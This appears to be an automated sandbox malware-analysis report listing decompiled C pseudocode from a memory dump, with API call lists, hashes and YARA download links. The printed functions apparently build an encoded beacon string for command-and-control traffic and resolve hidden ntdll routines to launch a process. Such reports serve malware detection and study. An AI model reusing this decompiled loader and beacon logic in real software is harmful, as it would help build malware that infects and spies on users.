                                                                                                                                                                                                                                0x02bb2530
                                                                                                                                                                                                                                0x02bb2531
                                                                                                                                                                                                                                0x02bb2538
                                                                                                                                                                                                                                0x02bb253a
                                                                                                                                                                                                                                0x02bb253b
                                                                                                                                                                                                                                0x02bb253b
                                                                                                                                                                                                                                0x02bb2538
                                                                                                                                                                                                                                0x02bb2542
                                                                                                                                                                                                                                0x02bb2558
                                                                                                                                                                                                                                0x02bb2544
                                                                                                                                                                                                                                0x02bb2544
                                                                                                                                                                                                                                0x02bb2551
                                                                                                                                                                                                                                0x02bb2551
                                                                                                                                                                                                                                0x02bb255c
                                                                                                                                                                                                                                0x02bb256a
                                                                                                                                                                                                                                0x02bb2574
                                                                                                                                                                                                                                0x02bb2574
                                                                                                                                                                                                                                0x02bb257b
                                                                                                                                                                                                                                0x02bb2591
                                                                                                                                                                                                                                0x02bb257d
                                                                                                                                                                                                                                0x02bb257d
                                                                                                                                                                                                                                0x02bb258a
                                                                                                                                                                                                                                0x02bb258a
                                                                                                                                                                                                                                0x02bb2595
                                                                                                                                                                                                                                0x02bb25a8
                                                                                                                                                                                                                                0x02bb25a8
                                                                                                                                                                                                                                0x02bb25ad
                                                                                                                                                                                                                                0x02bb25b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2597
                                                                                                                                                                                                                                0x02bb259a
                                                                                                                                                                                                                                0x02bb259f
                                                                                                                                                                                                                                0x02bb25a6
                                                                                                                                                                                                                                0x02bb25b8
                                                                                                                                                                                                                                0x02bb25ba
                                                                                                                                                                                                                                0x02bb25d0
                                                                                                                                                                                                                                0x02bb25bc
                                                                                                                                                                                                                                0x02bb25bc
                                                                                                                                                                                                                                0x02bb25c9
                                                                                                                                                                                                                                0x02bb25c9
                                                                                                                                                                                                                                0x02bb25d4
                                                                                                                                                                                                                                0x02bb25e0
                                                                                                                                                                                                                                0x02bb25e5
                                                                                                                                                                                                                                0x02bb25e5
                                                                                                                                                                                                                                0x02bb25d6
                                                                                                                                                                                                                                0x02bb25d9
                                                                                                                                                                                                                                0x02bb25d9
                                                                                                                                                                                                                                0x02bb25f3
                                                                                                                                                                                                                                0x02bb25f8
                                                                                                                                                                                                                                0x02bb25fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb25fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb25a6
                                                                                                                                                                                                                                0x02bb2595
                                                                                                                                                                                                                                0x02bb24fe
                                                                                                                                                                                                                                0x02bb24f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2400
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2432
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2464
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2496
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB24C8
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB24FA
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,02BB5884,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008,?,02BB5884), ref: 02BB25F8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008,?,02BB5884), ref: 02BB260B
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,02BB5884,02BB25DE,00000000,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005), ref: 02BB168E
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: memcpy.NTDLL(00000000,?,00000000,00000001,?,02BB5884), ref: 02BB16B1
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: memset.NTDLL ref: 02BB16C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3442150357-1536154274
                                                                                                                                                                                                                                • Opcode ID: 3540c32bdda60cd8443718ff89a8d1d47105bcdb8cde332d707f842266badd8f
                                                                                                                                                                                                                                • Instruction ID: d22328a027fb89010cf4c17b25c9241c765b9831a24c57cf4d6b35b7668d20ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3540c32bdda60cd8443718ff89a8d1d47105bcdb8cde332d707f842266badd8f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0181A174E10145AFCB23EB75CD94DFF76BAEF482447284CA6A906D7605EBF8D9048B20
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB70F4, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB70F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2bbd018; // 0x9ad51634
				asm("bswap eax");
				_t61 =  *0x2bbd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2bbd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2bbd00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x2bbd2e0; // 0x273a5a8
				_t3 = _t64 + 0x2bbe633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0x2bbd02c,  *0x2bbd004, _t59);
				_t67 = E02BB5C12();
				_t68 =  *0x2bbd2e0; // 0x273a5a8
				_t4 = _t68 + 0x2bbe673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E02BB508C(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2bbd2e0; // 0x273a5a8
					_t7 = _t126 + 0x2bbe8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2bbd270, 0, _v8);
				}
				_t73 = E02BB6706();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2bbd2e0; // 0x273a5a8
					_t11 = _t121 + 0x2bbe8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2bbd270, 0, _v8);
				}
				_t146 =  *0x2bbd364; // 0x52f95b0
				_t75 = E02BB6DFA(0x2bbd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x2bbd270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2bbd270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2bbd270, _t152, _v20);
						goto L26;
					}
					E02BBA425(GetTickCount());
					_t82 =  *0x2bbd364; // 0x52f95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2bbd364; // 0x52f95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2bbd364; // 0x52f95b0
					_t148 = E02BB22AB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2bbd270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2bbc2ac);
					_push(_t148);
					_t94 = E02BB2629();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2bbd270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02BB3037( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02BB651D();
						L22:
						HeapFree( *0x2bbd270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02BB145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E02BB2EA6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02BB53BB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02BB1522(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02BB53BB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                                                                                                                                0x02bb70f4
                                                                                                                                                                                                                                0x02bb70f4
                                                                                                                                                                                                                                0x02bb70f4
                                                                                                                                                                                                                                0x02bb70fd
                                                                                                                                                                                                                                0x02bb7106
                                                                                                                                                                                                                                0x02bb7108
                                                                                                                                                                                                                                0x02bb7108
                                                                                                                                                                                                                                0x02bb7115
                                                                                                                                                                                                                                0x02bb7120
                                                                                                                                                                                                                                0x02bb7123
                                                                                                                                                                                                                                0x02bb7128
                                                                                                                                                                                                                                0x02bb7131
                                                                                                                                                                                                                                0x02bb7134
                                                                                                                                                                                                                                0x02bb7139
                                                                                                                                                                                                                                0x02bb713c
                                                                                                                                                                                                                                0x02bb7141
                                                                                                                                                                                                                                0x02bb7144
                                                                                                                                                                                                                                0x02bb7150
                                                                                                                                                                                                                                0x02bb715d
                                                                                                                                                                                                                                0x02bb715f
                                                                                                                                                                                                                                0x02bb7165
                                                                                                                                                                                                                                0x02bb716a
                                                                                                                                                                                                                                0x02bb7175
                                                                                                                                                                                                                                0x02bb7177
                                                                                                                                                                                                                                0x02bb717a
                                                                                                                                                                                                                                0x02bb717c
                                                                                                                                                                                                                                0x02bb7181
                                                                                                                                                                                                                                0x02bb7187
                                                                                                                                                                                                                                0x02bb718c
                                                                                                                                                                                                                                0x02bb718f
                                                                                                                                                                                                                                0x02bb7194
                                                                                                                                                                                                                                0x02bb71a1
                                                                                                                                                                                                                                0x02bb71a3
                                                                                                                                                                                                                                0x02bb71a9
                                                                                                                                                                                                                                0x02bb71b3
                                                                                                                                                                                                                                0x02bb71b3
                                                                                                                                                                                                                                0x02bb71b5
                                                                                                                                                                                                                                0x02bb71ba
                                                                                                                                                                                                                                0x02bb71bf
                                                                                                                                                                                                                                0x02bb71c2
                                                                                                                                                                                                                                0x02bb71c7
                                                                                                                                                                                                                                0x02bb71d4
                                                                                                                                                                                                                                0x02bb71d6
                                                                                                                                                                                                                                0x02bb71e4
                                                                                                                                                                                                                                0x02bb71e4
                                                                                                                                                                                                                                0x02bb71e6
                                                                                                                                                                                                                                0x02bb71f4
                                                                                                                                                                                                                                0x02bb71f9
                                                                                                                                                                                                                                0x02bb71fb
                                                                                                                                                                                                                                0x02bb7200
                                                                                                                                                                                                                                0x02bb73c1
                                                                                                                                                                                                                                0x02bb73cb
                                                                                                                                                                                                                                0x02bb73d4
                                                                                                                                                                                                                                0x02bb7206
                                                                                                                                                                                                                                0x02bb7212
                                                                                                                                                                                                                                0x02bb7218
                                                                                                                                                                                                                                0x02bb721d
                                                                                                                                                                                                                                0x02bb73b5
                                                                                                                                                                                                                                0x02bb73bf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb73bf
                                                                                                                                                                                                                                0x02bb7229
                                                                                                                                                                                                                                0x02bb722e
                                                                                                                                                                                                                                0x02bb7237
                                                                                                                                                                                                                                0x02bb7248
                                                                                                                                                                                                                                0x02bb724c
                                                                                                                                                                                                                                0x02bb7255
                                                                                                                                                                                                                                0x02bb725b
                                                                                                                                                                                                                                0x02bb726a
                                                                                                                                                                                                                                0x02bb7271
                                                                                                                                                                                                                                0x02bb727a
                                                                                                                                                                                                                                0x02bb7280
                                                                                                                                                                                                                                0x02bb73a9
                                                                                                                                                                                                                                0x02bb73b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb73b3
                                                                                                                                                                                                                                0x02bb728c
                                                                                                                                                                                                                                0x02bb7292
                                                                                                                                                                                                                                0x02bb7293
                                                                                                                                                                                                                                0x02bb7298
                                                                                                                                                                                                                                0x02bb729d
                                                                                                                                                                                                                                0x02bb739f
                                                                                                                                                                                                                                0x02bb73a7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb73a7
                                                                                                                                                                                                                                0x02bb72a6
                                                                                                                                                                                                                                0x02bb72ad
                                                                                                                                                                                                                                0x02bb72b5
                                                                                                                                                                                                                                0x02bb72ba
                                                                                                                                                                                                                                0x02bb72c3
                                                                                                                                                                                                                                0x02bb72ce
                                                                                                                                                                                                                                0x02bb72d3
                                                                                                                                                                                                                                0x02bb72d8
                                                                                                                                                                                                                                0x02bb73d7
                                                                                                                                                                                                                                0x02bb738b
                                                                                                                                                                                                                                0x02bb738b
                                                                                                                                                                                                                                0x02bb7390
                                                                                                                                                                                                                                0x02bb739b
                                                                                                                                                                                                                                0x02bb739d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb739d
                                                                                                                                                                                                                                0x02bb72e2
                                                                                                                                                                                                                                0x02bb72e7
                                                                                                                                                                                                                                0x02bb72ec
                                                                                                                                                                                                                                0x02bb72f1
                                                                                                                                                                                                                                0x02bb7301
                                                                                                                                                                                                                                0x02bb7304
                                                                                                                                                                                                                                0x02bb730a
                                                                                                                                                                                                                                0x02bb7310
                                                                                                                                                                                                                                0x02bb7316
                                                                                                                                                                                                                                0x02bb7319
                                                                                                                                                                                                                                0x02bb731f
                                                                                                                                                                                                                                0x02bb7322
                                                                                                                                                                                                                                0x02bb7327
                                                                                                                                                                                                                                0x02bb732b
                                                                                                                                                                                                                                0x02bb732b
                                                                                                                                                                                                                                0x02bb7337
                                                                                                                                                                                                                                0x02bb7343
                                                                                                                                                                                                                                0x02bb7347
                                                                                                                                                                                                                                0x02bb7349
                                                                                                                                                                                                                                0x02bb734e
                                                                                                                                                                                                                                0x02bb7350
                                                                                                                                                                                                                                0x02bb7355
                                                                                                                                                                                                                                0x02bb735a
                                                                                                                                                                                                                                0x02bb7367
                                                                                                                                                                                                                                0x02bb736f
                                                                                                                                                                                                                                0x02bb7372
                                                                                                                                                                                                                                0x02bb7372
                                                                                                                                                                                                                                0x02bb734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7339
                                                                                                                                                                                                                                0x02bb733d
                                                                                                                                                                                                                                0x02bb7374
                                                                                                                                                                                                                                0x02bb7377
                                                                                                                                                                                                                                0x02bb7380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7380
                                                                                                                                                                                                                                0x02bb733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb733f
                                                                                                                                                                                                                                0x02bb7337

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB7108
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB7158
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB7175
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB71A1
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB71B3
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB71D4
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB71E4
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BB7212
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB7223
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB7237
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB7255
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,02BBC2AC,?,052F95B0), ref: 02BB728C
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 02BB72AD
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 02BB72B5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 02BB72C3
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 02BB72C9
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 02BB735A
                                                                                                                                                                                                                                  • Part of subcall function 02BB2EA6: SysAllocString.OLEAUT32(?), ref: 02BB2EE1
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 02BB739B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB73A7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,052F95B0), ref: 02BB73B3
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB73BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB73CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
                                                                                                                                                                                                                                • Opcode ID: 2f33d8580add302043de9df3832652c78caa3d0dbc8998266d4ac09a0238e4ed
                                                                                                                                                                                                                                • Instruction ID: a2b96d1baab92807730c2b8d5c6acec2ee7a7234e0c625fd49292c4d07a43eaf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f33d8580add302043de9df3832652c78caa3d0dbc8998266d4ac09a0238e4ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80915771D4020AAFCB12DFA4DC48AAE7BB9FF48390B1448A5F805D7210CBB4D961DF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB74A5, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E02BB74A5(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02BB6856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02BBA929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2bbd298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2bbd2e0; // 0x273a5a8
					_t18 = _t47 + 0x2bbe3b3; // 0x73797325
					_t68 = E02BB1EBA(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2bbd2e0; // 0x273a5a8
						_t19 = _t50 + 0x2bbe760; // 0x52f8d08
						_t20 = _t50 + 0x2bbe0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02BB7020();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02BB7020();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2bbd270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02BB53BB(_t70);
				goto L12;
			}


















                                                                                                                                                                                                                                0x02bb74ad
                                                                                                                                                                                                                                0x02bb74ad
                                                                                                                                                                                                                                0x02bb74bc
                                                                                                                                                                                                                                0x02bb74c3
                                                                                                                                                                                                                                0x02bb74c8
                                                                                                                                                                                                                                0x02bb75d5
                                                                                                                                                                                                                                0x02bb75dc
                                                                                                                                                                                                                                0x02bb75dc
                                                                                                                                                                                                                                0x02bb74d7
                                                                                                                                                                                                                                0x02bb74df
                                                                                                                                                                                                                                0x02bb74e2
                                                                                                                                                                                                                                0x02bb74e7
                                                                                                                                                                                                                                0x02bb74fc
                                                                                                                                                                                                                                0x02bb7502
                                                                                                                                                                                                                                0x02bb7503
                                                                                                                                                                                                                                0x02bb7506
                                                                                                                                                                                                                                0x02bb750c
                                                                                                                                                                                                                                0x02bb750f
                                                                                                                                                                                                                                0x02bb7514
                                                                                                                                                                                                                                0x02bb751c
                                                                                                                                                                                                                                0x02bb7528
                                                                                                                                                                                                                                0x02bb752c
                                                                                                                                                                                                                                0x02bb75bc
                                                                                                                                                                                                                                0x02bb7532
                                                                                                                                                                                                                                0x02bb7532
                                                                                                                                                                                                                                0x02bb7537
                                                                                                                                                                                                                                0x02bb753e
                                                                                                                                                                                                                                0x02bb7552
                                                                                                                                                                                                                                0x02bb7556
                                                                                                                                                                                                                                0x02bb75a5
                                                                                                                                                                                                                                0x02bb7558
                                                                                                                                                                                                                                0x02bb7559
                                                                                                                                                                                                                                0x02bb7560
                                                                                                                                                                                                                                0x02bb7579
                                                                                                                                                                                                                                0x02bb757b
                                                                                                                                                                                                                                0x02bb757f
                                                                                                                                                                                                                                0x02bb7586
                                                                                                                                                                                                                                0x02bb75a0
                                                                                                                                                                                                                                0x02bb7588
                                                                                                                                                                                                                                0x02bb7591
                                                                                                                                                                                                                                0x02bb7596
                                                                                                                                                                                                                                0x02bb7596
                                                                                                                                                                                                                                0x02bb7586
                                                                                                                                                                                                                                0x02bb75b4
                                                                                                                                                                                                                                0x02bb75b4
                                                                                                                                                                                                                                0x02bb752c
                                                                                                                                                                                                                                0x02bb75c3
                                                                                                                                                                                                                                0x02bb75cc
                                                                                                                                                                                                                                0x02bb75d0
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BB74C1,?,00000001,?,?,00000000,00000000), ref: 02BB687B
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BB689D
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BB68B3
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BB68C9
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BB68DF
                                                                                                                                                                                                                                  • Part of subcall function 02BB6856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BB68F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB750F
